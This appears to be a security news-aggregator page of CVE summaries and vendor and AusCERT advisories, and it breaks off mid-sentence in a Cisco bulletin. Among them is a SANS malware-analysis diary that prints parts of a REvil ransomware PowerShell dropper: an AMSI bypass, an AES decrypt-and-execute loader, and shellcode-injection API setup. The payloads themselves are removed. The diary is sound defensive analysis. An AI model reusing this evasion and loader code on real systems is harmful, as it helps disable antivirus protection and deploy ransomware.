Hírolvasó

NVD: all CVE · 2021. január 21.

CVE-2020-11151

Race condition occurs while calling user space ioctl from two different threads can results to use after free issue in video in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
NVD: all CVE · 2021. január 21.

CVE-2020-11152

Race condition in HAL layer while processing callback objects received from HIDL due to lack of synchronization between accessing objects in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
NVD: all CVE · 2021. január 21.

CVE-2020-11119

Buffer over-read can happen when the buffer length received from response handlers is more than the size of the payload in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking
SANS · 2021. január 21.

Powershell Dropping a REvil Ransomware, (Thu, Jan 21st)

I spotted a piece of Powershell code that deserved some investigations because it makes use of RunSpaces[1]. The file (SHA256:e1e19d637e6744fedb76a9008952e01ee6dabaecbc6ad2701dfac6aab149cecf) has a very low VT score: only 1/59![2].

The technique behind RunSpaces is helpful to create new threads on the existing Powershell process, and you can simply add what you need to it and send it off running. Here is an example of Runspace created by the malicious script:

$wabyynegzji = [runspacefactory]::CreateRunspace() $wabyynegzji.ApartmentState = "STA" $wabyynegzji.ThreadOptions = "ReuseThread" $wabyynegzji.Open() $vkzggaes = [PowerShell]::Create() $vkzggaes.Runspace = $wabyynegzji $vkzggaes.AddScript($pqxsxzakx) | out-null $vkzggaes.BeginInvoke() | out-null

The interesting line is the one which contains ‘AddScript’. It is used to attach the piece of Powershell code to be executed in the new threat. Here is the code (located in a separate Script Block):

[Scriptblock]$pqxsxzakx = { try{ [ref].Assembly.GetType('System.Management.Automation.Amsi' + 'Utils').GetField( \   'amsi'+'InitFailed', 'NonPublic,Static').SetValue($null, $true)   }catch{} }

This is a classic bypass for logging and AV detection[3]. Then, a second RunSpace is started:

$mnibvakvi =[runspacefactory]::CreateRunspace() $mnibvakvi.ApartmentState = "STA" $mnibvakvi.ThreadOptions = "ReuseThread" $mnibvakvi.Open() $mnibvakvi.SessionStateProxy.SetVariable("gbwqmnxwc", "L6jelvDCcKXK9A/+Lqto/5i9HtEK4jSsSdITqsGlgtQ=") $slqcphetxifbl = [PowerShell]::Create() $slqcphetxifbl.Runspace = $mnibvakvi $slqcphetxifbl.AddScript($zupcppfvxbxgvwbivbq) | out-null $slqcphetxifbl.BeginInvoke() | out-null

This block of code will decrypt and inject the payload in the current Powershell process. Note that you can pass variables to a RunSpace. In the example above, "gbwqmnxwc" contains the decryption key of the payload:

[Scriptblock]$zupcppfvxbxgvwbivbq = { function tyefcaneraxdmqsfh($gbwqmnxwc, $qpzspadssix, $iizcnwcbb) { $uuvqwwqjjkcolarhdeox=New-Object System.Security.Cryptography.AesCryptoServiceProvider; $uuvqwwqjjkcolarhdeox.Mode="CBC"; $uuvqwwqjjkcolarhdeox.Padding = "Zeros"; $uuvqwwqjjkcolarhdeox.BlockSize = 128; $uuvqwwqjjkcolarhdeox.KeySize = 256; $uuvqwwqjjkcolarhdeox.IV = $qpzspadssix; $uuvqwwqjjkcolarhdeox.Key = $gbwqmnxwc; $lafcsowawwnwcm=$uuvqwwqjjkcolarhdeox.CreateDecryptor(); $trgkzwqbqqbuteoe=$lafcsowawwnwcm.TransformFinalBlock($iizcnwcbb, 0, $iizcnwcbb.Length); return [System.Text.Encoding]::UTF8.GetString($trgkzwqbqqbuteoe).Trim([char]0) } $yweudaxvekawvopqdwdr = “___PAYLOAD_REMOVED___; $yweudaxvekawvopqdwdr = [System.Convert]::FromBase64String($yweudaxvekawvopqdwdr); $qpzspadssix = "+ViLpnC7vTHGHv6nVAcTXw=="; $qpzspadssix = [System.Convert]::FromBase64String($qpzspadssix); $gbwqmnxwc = [System.Convert]::FromBase64String($gbwqmnxwc); $trgkzwqbqqbuteoe = tyefcaneraxdmqsfh $gbwqmnxwc $qpzspadssix $yweudaxvekawvopqdwdr; iex $trgkzwqbqqbuteoe; }

The decrypted code is executed via Invoke-Expression("IEX"). Here is the interesting part of the code which loads the required API calls for performing the injection:

$VirtualAllocAddr = Get-ProcessAddr kernel32.dll ('Virt'+'ualA'+'lloc') $VirtualAllocDelegate = Get-DelType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]) $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, \   $VirtualAllocDelegate) $VirtualFreeAddr = Get-ProcessAddr kernel32.dll ('Vi'+'rtualFr'+'ee') $VirtualFreeDelegate = Get-DelType @([IntPtr], [Uint32], [UInt32]) ([Bool]) $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, \   $VirtualFreeDelegate) $CreateThreadAddr = Get-ProcessAddr kernel32.dll ("C"+"reat"+"eT"+"hre"+"ad") $CreateThreadDelegate = Get-DelType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate) $WaitForSingleObjectAddr = Get-ProcessAddr kernel32.dll ("Wa"+"it"+"ForSi"+"ngl"+"eObje"+"ct") $WaitForSingleObjectDelegate = Get-DelType @([IntPtr], [Int32]) ([Int]) $WaitForSingleObject = \ [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)

The shellcode is injected and decoded:

$hex_str = “__PAYLOAD_REMOVED__” $Shellcode = [byte[]] -split ($hex_str -replace '..', '0x$& ') [IO.File]::WriteAllBytes("c:\shellcode.tmp", $Shellcode) Invoke-Shcd $Shellcode

Let’s have a look at the shellcode now. It’s not starting at offset 0x0 but around 0x770:

remnux@remnux:/mnt/hgfs/MalwareZoo/20210116$ xxd -s +1900 shellcode.tmp |head -20 0000076c: 8b44 1624 8d04 580f b70c 108b 4416 1c8d .D.$..X.....D... 0000077c: 0488 8b04 1003 c2eb db4d 5a90 0003 0000 .........MZ..... 0000078c: 0004 0000 00ff ff00 00b8 0000 0000 0000 ................ 0000079c: 0040 0000 0000 0000 0000 0000 0000 0000 .@.............. 000007ac: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 000007bc: 0000 0000 00f0 0000 000e 1fba 0e00 b409 ................ 000007cc: cd21 b801 4ccd 2154 6869 7320 7072 6f67 .!..L.!This prog 000007dc: 7261 6d20 6361 6e6e 6f74 2062 6520 7275 ram cannot be ru 000007ec: 6e20 696e 2044 4f53 206d 6f64 652e 0d0d n in DOS mode... 000007fc: 0a24 0000 0000 0000 00c5 3aa4 0881 5bca .$........:...[. 0000080c: 5b81 5bca 5b81 5bca 5bba 05cf 5a80 5bca [.[.[.[.[...Z.[. 0000081c: 5bba 05c9 5a82 5bca 5bba 05ce 5a80 5bca [...Z.[.[...Z.[. 0000082c: 5b5c a404 5b80 5bca 5b5c a401 5b86 5bca [\..[.[.[\..[.[. 0000083c: 5b81 5bcb 5ba3 5bca 5b5c a41a 5b80 5bca [.[.[.[.[\..[.[. 0000084c: 5b16 05ce 5a9b 5bca 5b16 05c8 5a80 5bca [...Z.[.[...Z.[. 0000085c: 5b52 6963 6881 5bca 5b00 0000 0000 0000 [Rich.[.[....... 0000086c: 0000 0000 0000 0000 0050 4500 004c 0105 .........PE..L.. 0000087c: 0012 c4bf 5f00 0000 0000 0000 00e0 0002 ...._........... 0000088c: 210b 010e 0000 b800 0000 2201 0000 0000 !........."..... 0000089c: 001e 4300 0000 1000 0000 d000 0000 0000 ..C.............

Let’s extract this executable and have a look at it. Let’s skip the non-interesting bytes:

remnux@remnux:/mnt/hgfs/MalwareZoo/20210116$ tail -c +1926 shellcode.tmp >shellcode.exe

The PE file (SHA256:2fc374346290aaf1060840a5125d9867f99d192b03bfbef94268c2b679d6f905) is unknown on VT but it’s a REvil ransomware. How did I learn this easily?

When I’m teaching the SANS FOR610[4] class about malware analysis, I like to insist on the importance of using a lab completely disconnected from other networks because some weird things may (will!) happen… Because a picture is worth a thousand words, have a look at my lab:

I simply put a breakpoint in my debugger… at the wrong place! I executed the code and the breakpoint was never reached but the ransomware did the job.

About the ransomware itself, the ransomware notifies the victim (via a classic readme file) that files have been encrypted but also exfiltrated. As proof, they provide some URLs:

[+] Your secret data [+] We have uploaded all your private information, if no payment comes from you, we will post proof: hxxps://ibb[.]co/thJQ77F hxxps://ibb[.]co/cbd1CW6 hxxps://ibb[.]co/2FHfJp9 hxxps://ibb[.]co/h8vf4Y1 hxxps://ibb[.]co/MZ8WR2c hxxps://ibb[.]co/qkCjvp6 hxxps://ibb[.]co/D4hp7WN hxxps://ibb[.]co/k6JcMpm hxxps://ibb[.]co/0ZB3GxF

My sandbox being offline (network disconnected), there was no way to upload sample files to a cloud service. Files are just fake ones and do not belong to the victim!

I tried to run the ransomware again, this time with a fake network, and no network traffic was generated. The URLs with files remain the same, like hardcoded. Finally, I visited the Onion website provided in the readme file:

They provide a tool to submit some files to prove they can decrypt them and it worked. My REMnux wallpaper was decrypted! Ouf!

Based on these screenshots, we have indeed a REvil or Sodinokibi as described Talos last year in a blog post[5] but this time, it seems the way the attackers drop the malware changed... 

[1] https://devblogs.microsoft.com/scripting/beginning-use-of-powershell-runspaces-part-1/
[2] https://www.virustotal.com/gui/file/e1e19d637e6744fedb76a9008952e01ee6dabaecbc6ad2701dfac6aab149cecf/detection
[3] https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
[4] https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/
[5] https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
NVD: all CVE · 2021. január 21.

CVE-2020-27221

In Eclipse OpenJ9 up to version 0.23, there is potential for a stack-based buffer overflow when the virtual machine or JNI natives are converting from UTF-8 characters to platform encoding.
SANS · 2021. január 21.

ISC Stormcast For Thursday, January 21st, 2021 https://isc.sans.edu/podcastdetail.html?id=7338, (Thu, Jan 21st)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Ubuntu Secutity Notices · 2021. január 21.

USN-4689-4: Linux kernel update

USN-4689-3 fixed vulnerabilities in the NVIDIA server graphics drivers. This update provides the corresponding updates for the NVIDIA Linux DKMS kernel modules. Original advisory details: It was discovered that the NVIDIA GPU display driver for the Linux kernel contained a vulnerability that allowed user-mode clients to access legacy privileged APIs. A local attacker could use this to cause a denial of service or escalate privileges. (CVE-2021-1052) It was discovered that the NVIDIA GPU display driver for the Linux kernel did not properly validate a pointer received from userspace in some situations. A local attacker could use this to cause a denial of service. (CVE-2021-1053) Xinyuan Lyu discovered that the NVIDIA GPU display driver for the Linux kernel did not properly restrict device-level GPU isolation. A local attacker could use this to cause a denial of service or possibly expose sensitive information. (CVE-2021-1056)
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0256 - [SUSE] perl-Convert-ASN1: Denial of service - Remote/unauthenticated

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0256 Security update for perl-Convert-ASN1 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: perl-Convert-ASN1 Publisher: SUSE Operating System: SUSE Impact/Access: Denial of Service -- Remote/Unauthenticated Resolution: Patch/Upgrade CVE Names: CVE-2013-7488 Original Bulletin: https://www.suse.com/support/update/announcement/2021/suse-su-20210172-1 - --------------------------BEGIN INCLUDED TEXT-------------------- SUSE Security Update: Security update for perl-Convert-ASN1 ______________________________________________________________________________ Announcement ID: SUSE-SU-2021:0172-1 Rating: moderate References: #1168934 Cross-References: CVE-2013-7488 Affected Products: SUSE Linux Enterprise Server 12-SP5 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for perl-Convert-ASN1 fixes the following issue: o CVE-2013-7488: Fixed an infinite loop via unexpected input (bsc#1168934). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: o SUSE Linux Enterprise Server 12-SP5: zypper in -t patch SUSE-SLE-SERVER-12-SP5-2021-172=1 Package List: o SUSE Linux Enterprise Server 12-SP5 (noarch): perl-Convert-ASN1-0.26-5.3.1 References: o https://www.suse.com/security/cve/CVE-2013-7488.html o https://bugzilla.suse.com/1168934 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAklVuNLKJtyKPYoAQh2PQ/+PcKMbqhLh6lHhlEGyFZmH7XNtCcimtE3 PtX0wzH1zbRri7cQaZx8zrllQ+XOGQ3/bvZIDHIx5yjEpMUSOnXJlu2rr7cxjRVz z8nYZTew22Tu3MEQfDW1qhDduOLTl5e2VSyCjnOwZWO2Jw8upOB32fqPYe1CPHPB 777qj6kAZg1Gw8xtdlvmZ93UW9rj4Z7z+SY8PZnYGdoS3LQ/Rm8odkWEdf6MSzNR mrezImhBY2gzQbesDa/KMGP59D/q8lAAiYvL6I0B7UXKVR75DxYQ5Qi5SwyFpKCA t5w2G26mjrGR3tXAerWHy88PhiqKtwSd/lIyoKNgbyQCb/Bziw2SssoLPNRUsjNw 43TGtgbCclPdo2/iOInkea110TOg3Ahi1HXvGc9eph9GsplwMM+osKstpzIDlk6x MCLJPyn+t0FeHLnEsJQ0jYG3jkDiNs8uy09cP3xc6Fmaf+uFHUiqRSAvP5aZwC46 IbLRBXbLwmERJLTn6kr6v9tei+1j5ZOX2ieqxW1PcijRfD6QupbAqpNoyncPQb8O MrvHxyeeMWH/lR+GnBfzOVA8e4kCoD6C4NCMIEWz+9+rb5ZbKBO+EwwOUW7IhHad pBqov8IQAFcJYlOfyJo5mdcpV/fXDXCWql90WvY3OLeNnEno9cWvcmac9X6yTnta wQBzaRxm0Is= =tFFz -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0255 - [SUSE] postgresql and postgresql13: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0255 Security update for postgresql, postgresql13 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: postgresql postgresql13 Publisher: SUSE Operating System: SUSE Impact/Access: Execute Arbitrary Code/Commands -- Remote/Unauthenticated Access Confidential Data -- Remote/Unauthenticated Resolution: Patch/Upgrade CVE Names: CVE-2020-25696 CVE-2020-25695 CVE-2020-25694 Reference: ESB-2021.0212 ESB-2021.0104 ESB-2020.4449 Original Bulletin: https://www.suse.com/support/update/announcement/2021/suse-su-20210175-1 - --------------------------BEGIN INCLUDED TEXT-------------------- SUSE Security Update: Security update for postgresql, postgresql13 ______________________________________________________________________________ Announcement ID: SUSE-SU-2021:0175-1 Rating: moderate References: #1178666 #1178667 #1178668 #1178961 Cross-References: CVE-2020-25694 CVE-2020-25695 CVE-2020-25696 Affected Products: SUSE Linux Enterprise Module for Server Applications 15-SP2 SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2 SUSE Linux Enterprise Module for Basesystem 15-SP2 ______________________________________________________________________________ An update that solves three vulnerabilities, contains one feature and has one errata is now available. Description: This update for postgresql, postgresql13 fixes the following issues: This update ships postgresql13. Upgrade to version 13.1: o CVE-2020-25695, bsc#1178666: Block DECLARE CURSOR ... WITH HOLD and firing of deferred triggers within index expressions and materialized view queries. o CVE-2020-25694, bsc#1178667: a) Fix usage of complex connection-string parameters in pg_dump, pg_restore, clusterdb, reindexdb, and vacuumdb. b) When psql's \connect command re-uses connection parameters, ensure that all non-overridden parameters from a previous connection string are re-used. o CVE-2020-25696, bsc#1178668: Prevent psql's \gset command from modifying specially-treated variables. o Fix recently-added timetz test case so it works when the USA is not observing daylight savings time. (obsoletes postgresql-timetz.patch) o https://www.postgresql.org/about/news/2111/ o https://www.postgresql.org/docs/13/release-13-1.html Initial packaging of PostgreSQL 13: o https://www.postgresql.org/about/news/2077/ o https://www.postgresql.org/docs/13/release-13.html o bsc#1178961: %ghost the symlinks to pg_config and ecpg. Changes in postgresql wrapper package: o Bump major version to 13. o We also transfer PostgreSQL 9.4.26 to the new package layout in SLE12-SP2 and newer. Reflect this in the conflict with postgresql94. o Also conflict with PostgreSQL versions before 9. o Conflicting with older versions is not limited to SLE. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: o SUSE Linux Enterprise Module for Server Applications 15-SP2: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-SP2-2021-175=1 o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2: zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-SP2-2021-175=1 o SUSE Linux Enterprise Module for Basesystem 15-SP2: zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-175=1 Package List: o SUSE Linux Enterprise Module for Server Applications 15-SP2 (aarch64 ppc64le s390x x86_64): libecpg6-13.1-5.3.15 libecpg6-debuginfo-13.1-5.3.15 postgresql13-contrib-13.1-5.3.15 postgresql13-contrib-debuginfo-13.1-5.3.15 postgresql13-debuginfo-13.1-5.3.15 postgresql13-debugsource-13.1-5.3.10 postgresql13-debugsource-13.1-5.3.15 postgresql13-devel-13.1-5.3.15 postgresql13-devel-debuginfo-13.1-5.3.15 postgresql13-plperl-13.1-5.3.15 postgresql13-plperl-debuginfo-13.1-5.3.15 postgresql13-plpython-13.1-5.3.15 postgresql13-plpython-debuginfo-13.1-5.3.15 postgresql13-pltcl-13.1-5.3.15 postgresql13-pltcl-debuginfo-13.1-5.3.15 postgresql13-server-13.1-5.3.15 postgresql13-server-debuginfo-13.1-5.3.15 postgresql13-server-devel-13.1-5.3.15 postgresql13-server-devel-debuginfo-13.1-5.3.15 o SUSE Linux Enterprise Module for Server Applications 15-SP2 (noarch): postgresql-contrib-13-4.6.7 postgresql-devel-13-4.6.7 postgresql-docs-13-4.6.7 postgresql-plperl-13-4.6.7 postgresql-plpython-13-4.6.7 postgresql-pltcl-13-4.6.7 postgresql-server-13-4.6.7 postgresql-server-devel-13-4.6.7 postgresql13-docs-13.1-5.3.15 o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2 (aarch64 ppc64le s390x x86_64): postgresql13-test-13.1-5.3.15 o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2 (noarch): postgresql-test-13-4.6.7 o SUSE Linux Enterprise Module for Basesystem 15-SP2 (aarch64 ppc64le s390x x86_64): libpq5-13.1-5.3.15 libpq5-debuginfo-13.1-5.3.15 postgresql13-13.1-5.3.15 postgresql13-debuginfo-13.1-5.3.15 postgresql13-debugsource-13.1-5.3.10 postgresql13-debugsource-13.1-5.3.15 o SUSE Linux Enterprise Module for Basesystem 15-SP2 (noarch): postgresql-13-4.6.7 o SUSE Linux Enterprise Module for Basesystem 15-SP2 (x86_64): libpq5-32bit-13.1-5.3.15 libpq5-32bit-debuginfo-13.1-5.3.15 References: o https://www.suse.com/security/cve/CVE-2020-25694.html o https://www.suse.com/security/cve/CVE-2020-25695.html o https://www.suse.com/security/cve/CVE-2020-25696.html o https://bugzilla.suse.com/1178666 o https://bugzilla.suse.com/1178667 o https://bugzilla.suse.com/1178668 o https://bugzilla.suse.com/1178961 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkkM+NLKJtyKPYoAQgDlBAAjcsPwTIg/debH4uf6Zjwp4r3BxYvHtMy cyBgn+SAmRs3yViXzB+xkoZPwlKa58qfWnfpwkt1dx+G1Q2NP+3OVgAdfPT/g0zr w9pbPOxUPa8kNUiRJUipqlXNoGxcq3UDQGiW5SZoqWpU5aAnvv1DmxakpipWHvDm HDUlDcmbtO3FrMmUt+VOm/T25FSTAL43jbhmwW5C5oRNQpwwZGEBJ0czbFqRYC/a jxAaztTIBGCcl+TQcq0j1Zt536XVRXZhwtZYuIX1svvndr5VRcknfNKIh77cYGdE S80DCoKUqC2Ho0UL7cZ8Nxo1LKXx1eH0K47smQclYiT7B+3tAEccENDqW3y5RCCW +csPQ12feyKRN8q1hkmg92fbMZw6GdSL513Y1bsQXnNxYbaSRY/8w1mZ1/Om5o2K gVMPdkDJgu2rXvrBZTWKQr7DgrU9T1ME1j8xZlvDc2X/RlPeTD38RSzb9Tp9R/VO qqMc3acS0yoY9uxDykSA6nFNERZmzi2OojAo687lOzkpHg2GcxrLv/ULibm6/vGT 7olAgEWtl1usP3qxqnkz8WOQEmO9+Ks3oLoOwKfkgORihSLpgDogrQ353QEcAJK0 p880GkXeWJ6/NJGTpl4VLhwnorvrCD8L6aCrgXUrJQzbBtN8/gImeGqZ+VFVIial ujSuqQpT4Bs= =p4+F -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0254 - [SUSE] xstream: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0254 Security update for xstream 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: xstream Publisher: SUSE Operating System: SUSE Impact/Access: Execute Arbitrary Code/Commands -- Existing Account Delete Arbitrary Files -- Remote/Unauthenticated Access Confidential Data -- Existing Account Reduced Security -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2020-26259 CVE-2020-26258 CVE-2020-26217 Reference: ESB-2021.0131 ESB-2021.0019 ESB-2020.4241 Original Bulletin: https://www.suse.com/support/update/announcement/2021/suse-su-20210176-1 - --------------------------BEGIN INCLUDED TEXT-------------------- SUSE Security Update: Security update for xstream ______________________________________________________________________________ Announcement ID: SUSE-SU-2021:0176-1 Rating: important References: #1180145 #1180146 #1180994 Cross-References: CVE-2020-26217 CVE-2020-26258 CVE-2020-26259 Affected Products: SUSE Linux Enterprise Module for Development Tools 15-SP2 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for xstream fixes the following issues: xstream was updated to version 1.4.15. o CVE-2020-26217: Fixed a remote code execution due to insecure XML deserialization when relying on blocklists (bsc#1180994). o CVE-2020-26258: Fixed a server-side request forgery vulnerability (bsc# 1180146). o CVE-2020-26259: Fixed an arbitrary file deletion vulnerability (bsc# 1180145). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: o SUSE Linux Enterprise Module for Development Tools 15-SP2: zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP2-2021-176=1 Package List: o SUSE Linux Enterprise Module for Development Tools 15-SP2 (noarch): xstream-1.4.15-3.3.2 References: o https://www.suse.com/security/cve/CVE-2020-26217.html o https://www.suse.com/security/cve/CVE-2020-26258.html o https://www.suse.com/security/cve/CVE-2020-26259.html o https://bugzilla.suse.com/1180145 o https://bugzilla.suse.com/1180146 o https://bugzilla.suse.com/1180994 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAkkFONLKJtyKPYoAQignA//V7qN8ae1oDF6qUykQepclL/IrtHf230N TmHVc0avPK7iH6mbh+cspueVxLlPEzt+Fb3/Il12m1TjLo2cjxc3yHhxxQINBo02 N0b7sRovjsQYLuF0QNNOh9oQTAuihFjfjp6M4SK6PBm60WAATLWFnT7KWWSoKW75 diZ4Ilf+mlo1uvxtadQmbzfW2GlXMyEOe7hhQy0fcLQrnQflz/ee6i2pVlPAp8IM FAgY/zp7P1ErenLefT0FyiITiNzhURDEtEDmOIJGr5u2m2/sb1gMMIc8HP28z92d RpkQBGPj1t37xWQ05L3XwpSAwsYTU9Uc6J5H5q/dY3pjMa+xhVHae3yQTCpeQ12J f6W4N5Hd2EuH0MkjLTXTewtftY8zDN0LKPSjSeAJzRZv3cmTHx/ahon1RyETOnvq dpUUZCX5LjmBo1F15hRVDtREjr6GdF7FIxvbib6pYgduQrnXiwX7/OyC8qCsM5jF czseTpP1Uuq0tWotiUUMPWaeJvUJk4Dh6blKxOtOMQwBw7O8wJVPzCr/TLEsYqVc XZ7senIOFtdJE8PIiCBhnDE6Y/VBcSUyxYyggcI3Ci2SU/Rp6ruDOWbr/vnKIcNd GszMU2azKicY/SIv44zzKAdPW2DJZ09YgbXx0dnfvb+Q9OI0t+gOTB2Owdqku91i GqJvgaj3GGQ= =0ftX -----END PGP SIGNATURE-----
AusCERT - Security Bulletins · 2021. január 21.

ESB-2021.0253 - [Cisco] Cisco StarOS: Denial of service - Remote/unauthenticated

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0253 Cisco StarOS IPv4 Denial of Service Vulnerability 21 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco StarOS Publisher: Cisco Systems Operating System: Cisco Impact/Access: Denial of Service -- Remote/Unauthenticated Resolution: Patch/Upgrade CVE Names: CVE-2021-1353 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asr-mem-leak-dos-MTWGHKk3 - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco StarOS IPv4 Denial of Service Vulnerability Priority: Medium Advisory ID: cisco-sa-asr-mem-leak-dos-MTWGHKk3 First Published: 2021 January 20 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvq83868 CSCvv69023 CVE Names: CVE-2021-1353 CWEs: CWE-401 Summary o A vulnerability in the IPv4 protocol handling of Cisco StarOS could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The 